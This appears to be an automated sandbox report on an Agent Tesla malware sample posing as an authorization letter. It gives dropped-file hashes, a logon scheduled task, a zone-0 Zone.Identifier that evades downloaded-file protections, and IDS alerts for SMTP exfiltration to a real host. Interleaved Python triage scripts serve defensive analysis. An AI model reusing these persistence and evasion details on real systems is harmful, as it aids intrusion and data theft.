                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1581
                                                                Entropy (8bit):5.104782811711384
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                                                MD5:55D30B34C86EA4E93D9FF780B8C450FA
                                                                SHA1:761F4FE2CE32B3D912A1898D57DBBEBF8F8B005B
                                                                SHA-256:857FA04642FE7003EB7D4AC07216F000A4D1595451F21589F63AFA7790AF15FC
                                                                SHA-512:D807ADBEFA9CDE8D40379113CA36EBF1EC72D43BBD52A11347897C1DB2E8B8B62F5000241759517F2DB1AC29D6E01DD81AF441897AED0D1AA1F56D86B3AE3169
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                                Process:C:\Users\user\Desktop\autorization Letter.exe
                                                                File Type:XML 1.0 document, ASCII text
                                                                Category:dropped
                                                                Size (bytes):1581
                                                                Entropy (8bit):5.104782811711384
                                                                Encrypted:false
                                                                SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtOxvn:cgergYrFdOFzOzN33ODOiDdKrsuTCv
                                                                MD5:55D30B34C86EA4E93D9FF780B8C450FA
                                                                SHA1:761F4FE2CE32B3D912A1898D57DBBEBF8F8B005B
                                                                SHA-256:857FA04642FE7003EB7D4AC07216F000A4D1595451F21589F63AFA7790AF15FC
                                                                SHA-512:D807ADBEFA9CDE8D40379113CA36EBF1EC72D43BBD52A11347897C1DB2E8B8B62F5000241759517F2DB1AC29D6E01DD81AF441897AED0D1AA1F56D86B3AE3169
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
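The two dropped files above are a Task Scheduler definition: a LogonTrigger, a Principal running with an InteractiveToken at LeastPrivilege, StartWhenAvailable set, AllowHardTerminate cleared. Note also that the declaration says UTF-16 while the file type is plain ASCII, and that the preview is cut off before the Actions element. The following triage script is an added example and is not part of the report or the sample; it parses a constructed task document modelled on the visible fields (the Actions block and its command path are an assumption, since the report does not show them) and lists the properties that make such a task a user-level persistence mechanism.

```python
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed sample modelled on the fields visible in the dropped task
# definition. The <Actions> element is an assumption: the report's preview is
# cut off before it, so the command path is a hypothetical placeholder.
SAMPLE_TASK_XML = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\example\\payload.exe</Command>
    </Exec>
  </Actions>
</Task>
"""

# Directories an unprivileged user can write to; a task whose action lives
# in one of them is the usual user-level persistence pattern.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def load_task_xml(raw: bytes) -> str:
    """Decode a task file on its BOM, not on its XML declaration.

    Windows normally writes task XML as UTF-16 with a BOM; the dropped file
    here declares UTF-16 but is ASCII, so the declaration is stripped to keep
    it from conflicting with the decoded text.
    """
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8")
    return re.sub(r"^\s*<\?xml[^>]*\?>", "", text)


def parse_task(text: str) -> dict:
    """Pull the persistence-relevant fields out of a Task Scheduler document."""
    root = ET.fromstring(text)

    def field(path: str) -> str:
        node = root.find(path)
        return (node.text or "").strip() if node is not None else ""

    triggers_el = root.find(f"{NS}Triggers")
    triggers = []
    for trig in (list(triggers_el) if triggers_el is not None else []):
        enabled = trig.findtext(f"{NS}Enabled", default="true").strip().lower()
        triggers.append((trig.tag.replace(NS, ""), enabled == "true"))

    return {
        "author": field(f"{NS}RegistrationInfo/{NS}Author"),
        "registered": field(f"{NS}RegistrationInfo/{NS}Date"),
        "triggers": triggers,
        "logon_type": field(f"{NS}Principals/{NS}Principal/{NS}LogonType"),
        "run_level": field(f"{NS}Principals/{NS}Principal/{NS}RunLevel"),
        "start_when_available": field(f"{NS}Settings/{NS}StartWhenAvailable").lower() == "true",
        # Task Scheduler defaults AllowHardTerminate to true when it is absent.
        "allow_hard_terminate": field(f"{NS}Settings/{NS}AllowHardTerminate").lower() != "false",
        "commands": [(c.text or "").strip() for c in root.iter(f"{NS}Command")],
    }


def persistence_findings(task: dict) -> list:
    """Return the reasons a parsed task looks like user-level persistence."""
    findings = []
    for name, enabled in task["triggers"]:
        if name == "LogonTrigger" and enabled:
            findings.append("enabled LogonTrigger: runs at every interactive logon")
    for cmd in task["commands"]:
        if any(marker in cmd.lower() for marker in USER_WRITABLE):
            findings.append(f"action runs from a user-writable path: {cmd}")
    if task["start_when_available"]:
        findings.append("StartWhenAvailable=true: a missed logon trigger is replayed later")
    if not task["allow_hard_terminate"]:
        findings.append("AllowHardTerminate=false: the scheduler will not forcibly stop it")
    if task["run_level"] == "LeastPrivilege":
        findings.append("RunLevel=LeastPrivilege: registers and runs as the standard user, no elevation")
    return findings
```

Running `persistence_findings(parse_task(load_task_xml(SAMPLE_TASK_XML.encode())))` yields five findings for the constructed sample. The same functions apply to task files recovered from `C:\Windows\System32\Tasks\` on a live host, which are the UTF-16 form the BOM branch handles.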
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:modified
                                                                Size (bytes):45984
                                                                Entropy (8bit):6.16795797263964
                                                                Encrypted:false
                                                                SSDEEP:768:4BbSoy+SdIBf0k2dsjYg6Iq8S1GYqWH8BR:noOIBf0ddsjY/ZGyc7
                                                                MD5:9D352BC46709F0CB5EC974633A0C3C94
                                                                SHA1:1969771B2F022F9A86D77AC4D4D239BECDF08D07
                                                                SHA-256:2C1EEB7097023C784C2BD040A2005A5070ED6F3A4ABF13929377A9E39FAB1390
                                                                SHA-512:13C714244EC56BEEB202279E4109D59C2A43C3CF29F90A374A751C04FD472B45228CA5A0178F41109ED863DBD34E0879E4A21F5E38AE3D89559C57E6BE990A9B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                 • Filename: rMT103SwiftCopyoFPayment.exe, Detection: malicious
                                                                 • Filename: Shipping Document.exe, Detection: malicious
                                                                 • Filename: COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe, Detection: malicious
                                                                 • Filename: DHL- CBJ520818836689.pdf.exe, Detection: malicious
                                                                 • Filename: DHL- CBJ520818836689.exe, Detection: malicious
                                                                 • Filename: Shipping documents.exe, Detection: malicious
                                                                 • Filename: Shipping doc.exe, Detection: malicious
                                                                 • Filename: 80c619d931fa4e5c89fe87aac0b6b143.exe, Detection: malicious
                                                                 • Filename: Rejected Shipping Documents compiled PL pdf.exe, Detection: malicious
                                                                 • Filename: Public Holiday mem_Notice 2024.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..d..........V.... ........@.. ..............................s.....`.....................................O.......8............r...A.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
                                                                Process:C:\Users\user\Desktop\autorization Letter.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):841224
                                                                Entropy (8bit):7.631178244358003
                                                                Encrypted:false
                                                                SSDEEP:24576:4nIY7owVZppDU/4p2v213ZYip6rhrCWKjMA:4t7o6Zp9L2v2TYXrhrCWkMA
                                                                MD5:457F6CB01C6F3F7922AC201F70111AE5
                                                                SHA1:934E5433FC83AF812DB461E3E7748C311E19B1BC
                                                                SHA-256:CA471400001374BDDF5E6FF03DB7889CF53BD516FE64209FAEE8B894B454C3C5
                                                                SHA-512:2403C0AB282E085B54AB5689FBAE2328CF16D19BDEC2EDB24E32AD6BAB79BDF2ABA26AA52A48B44F9F573E390636A1401C7F7B30104EDA131D4BEC9776D06A9B
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<=...............0.................. ... ....@.. ....................................@.....................................O.... ...................6..........8...p............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................H........;..h+......-... g................................................s....}.....s....}......}.....(.......(.....*...0..C........r...p(..........+)......{.....o......{....o.....o....&...X....i2.*..0...........r...p.*.0............{....o......{....o......{....o......{....o......{....o.......{......(...+...(.....o.....(.....( .....s*.........(.............o!...("...&...*.......n..{......&..(#....*...0..|...........{....o....r...p($.....,...+2.{....o......(%........,...{....
                                                                Process:C:\Users\user\Desktop\autorization Letter.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0
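The 26-byte file above has the INI layout of a Zone.Identifier alternate data stream, the NTFS stream that carries the mark-of-the-web, but with ZoneId=0 (Local Machine) rather than the ZoneId=3 (Internet) a browser or mail client writes. Protections that key on a downloaded file, such as SmartScreen and Office Protected View, engage for zones 3 and 4, so a zone-0 stream makes the file look local. The parser and verdict below are an added example, not code from the report or the sample; the two stream bodies are constructed (the dropped one to match the preview, with the blank line between header and key an assumption about its line endings; the browser one with an invented host URL), and `read_zone_identifier` assumes it is run on an NTFS volume on Windows.

```python
# Zone IDs used by the Zone.Identifier stream (URLMON security zones).
ZONES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites",
         3: "Internet", 4: "RestrictedSites"}

# Constructed to match the 26-byte preview "[ZoneTransfer]....ZoneId=0";
# the empty line between header and key is an assumption about the line endings.
DROPPED_STREAM = b"[ZoneTransfer]\r\n\r\nZoneId=0"

# Constructed example of what a browser writes for an Internet download
# (host name invented for the example).
DOWNLOADED_STREAM = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                     b"ReferrerUrl=https://mail.example.invalid/\r\n"
                     b"HostUrl=https://mail.example.invalid/autorization%20Letter.exe\r\n")


def parse_zone_identifier(data: bytes) -> dict:
    """Parse the INI-style body of a Zone.Identifier stream into its fields."""
    fields, section, seen = {}, None, False
    for line in data.decode("utf-8", errors="replace").splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            seen = seen or section == "ZoneTransfer"
            continue
        if section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)  # URLs may themselves contain '='
            fields[key.strip()] = value.strip()
    if not seen:
        raise ValueError("no [ZoneTransfer] section: not a Zone.Identifier stream")
    zone_id = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    return {
        "zone_id": zone_id,
        "zone": ZONES.get(zone_id, "Unknown"),
        "referrer": fields.get("ReferrerUrl"),
        "host": fields.get("HostUrl"),
    }


def motw_verdict(info: dict) -> str:
    """State whether downloaded-file protections will engage for this stream."""
    if info["zone_id"] is None:
        return "missing or malformed ZoneId: stream carries no usable mark-of-the-web"
    if info["zone_id"] >= 3:
        return (f"ZoneId={info['zone_id']} ({info['zone']}): "
                "mark-of-the-web present, protections engage")
    return (f"ZoneId={info['zone_id']} ({info['zone']}): treated as a local file; "
            "protections keyed on the Internet and Restricted zones do not engage")


def read_zone_identifier(path: str):
    """Read the stream from a file on NTFS (Windows only); None means no mark."""
    try:
        with open(path + ":Zone.Identifier", "rb") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:  # stream absent, or a filesystem without alternate data streams
        return None
```

On a live host, `read_zone_identifier(r"C:\Users\user\Desktop\autorization Letter.exe")` returning a zone-0 result for a file that arrived by e-mail is the check that separates a genuinely local file from one whose mark has been overwritten; a file with no stream at all is the other case to look for, since deleting the stream has the same effect.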
                                                                Process:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1141
                                                                Entropy (8bit):4.442398121585593
                                                                Encrypted:false
                                                                SSDEEP:24:zKLXkhDObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0hDQntKKH1MqJC
                                                                MD5:6FB4D27A716A8851BC0505666E7C7A10
                                                                SHA1:AD2A232C6E709223532C4D1AB892303273D8C814
                                                                SHA-256:1DC36F296CE49BDF1D560B527DB06E1E9791C10263459A67EACE706C6DDCDEAE
                                                                SHA-512:3192095C68C6B7AD94212B7BCA0563F2058BCE00C0C439B90F0E96EA2F029A37C2F2B69487591B494C1BA54697FE891E214582E392127CB8C90AB682E0D81ADB
                                                                Malicious:false
                                                                Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.631178244358003
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: autorization Letter.exe
File size: 841'224 bytes
MD5: 457f6cb01c6f3f7922ac201f70111ae5
SHA1: 934e5433fc83af812db461e3e7748c311e19b1bc
SHA256: ca471400001374bddf5e6ff03db7889cf53bd516fe64209faee8b894b454c3c5
SHA512: 2403c0ab282e085b54ab5689fbae2328cf16d19bdec2edb24e32ad6bab79bdf2aba26aa52a48b44f9f573e390636a1401c7f7b30104eda131d4bec9776d06a9b
SSDEEP: 24576:4nIY7owVZppDU/4p2v213ZYip6rhrCWKjMA:4t7o6Zp9L2v2TYXrhrCWkMA
TLSH: 6805F1A079328843D53B4FBC8823D2B54AB49C4E7113A29B71EC7E373C5928D594B67E
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...<=................0.................. ... ....@.. ....................................@................................
Icon Hash: 074dd8a2a2ce7107
Entrypoint: 0x4a05ee
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x8BCF3D3C [Sat Apr 30 07:37:32 2044 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Signature Valid: false
Signature Issuer: CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 13/11/2018 01:00:00, 09/11/2021 00:59:59
Subject Chain:
• CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version: 3
Thumbprint MD5: DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1: 5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256: 4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial: 7C1118CBBADC95DA3752C46E47A27438
Instruction (entry point disassembly):
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the "add byte ptr [eax], al" line, the x86 decoding of 00 00 padding bytes, is repeated 97 times in the original listing)
Data Directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa059a | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa2000 | 0x2b488 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xca000 | 0x3608 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xce000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9f438 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x9e5f4 | 0x9e600 | b6a916eb4bb48054dc07953780c30cb4 | False | 0.9414401637726914 | data | 7.850552008247241 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa2000 | 0x2b488 | 0x2b600 | 2339f1b787e9ab0484f1c5ae87ff218d | False | 0.22889836995677235 | data | 5.985036348981686 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xce000 | 0xc | 0x200 | 3a1fc2d10edd7b039ba69dc6c4d84305 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources:
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa22b0 | 0x34a1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9923550805314333
RT_ICON | 0xa5754 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.11334733230805631
RT_ICON | 0xb5f7c | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | | | 0.17271915072524702
RT_ICON | 0xbf424 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | | | 0.19371534195933457
RT_ICON | 0xc48ac | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | | | 0.18192017005196032
RT_ICON | 0xc8ad4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.2454356846473029
RT_ICON | 0xcb07c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.28119136960600377
RT_ICON | 0xcc124 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | | | 0.3639344262295082
RT_ICON | 0xccaac | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.44858156028368795
RT_GROUP_ICON | 0xccf14 | 0x84 | data | | | 0.7045454545454546
RT_VERSION | 0xccf98 | 0x304 | data | | | 0.43523316062176165
RT_MANIFEST | 0xcd29c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Imports:
DLL | Import
mscoree.dll | _CorExeMain
Suricata IDS alerts:
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T07:03:00.331719+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:00.331719+0200 | 2839723 | ETPRO MALWARE Win32/Agent Tesla SMTP Activity | 1 | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:00.331719+0200 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:14.516239+0200 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:14.516239+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:18.387344+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:18.387344+0200 | 2839723 | ETPRO MALWARE Win32/Agent Tesla SMTP Activity | 1 | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:18.387344+0200 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.5 | 49711 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:20.151372+0200 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
2024-09-26T07:03:20.151372+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49712 | 192.185.129.60 | 587 | TCP
TCP packets:
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 07:03:12.377485991 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:12.382375002 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:12.384222031 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:13.070116997 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.071027040 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:13.075896025 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.247092009 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.248347998 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:13.253300905 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.414484978 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.415596008 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:13.420527935 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.787029982 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.787302017 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:13.792212009 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.962662935 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:13.962903023 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:13.967840910 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.343059063 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.343246937 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:14.349797964 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.515552998 CEST | 587 | 49711 | 192.185.129.60 | 192.168.2.5
Sep 26, 2024 07:03:14.516191006 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
Sep 26, 2024 07:03:14.516238928 CEST | 49711 | 587 | 192.168.2.5 | 192.185.129.60
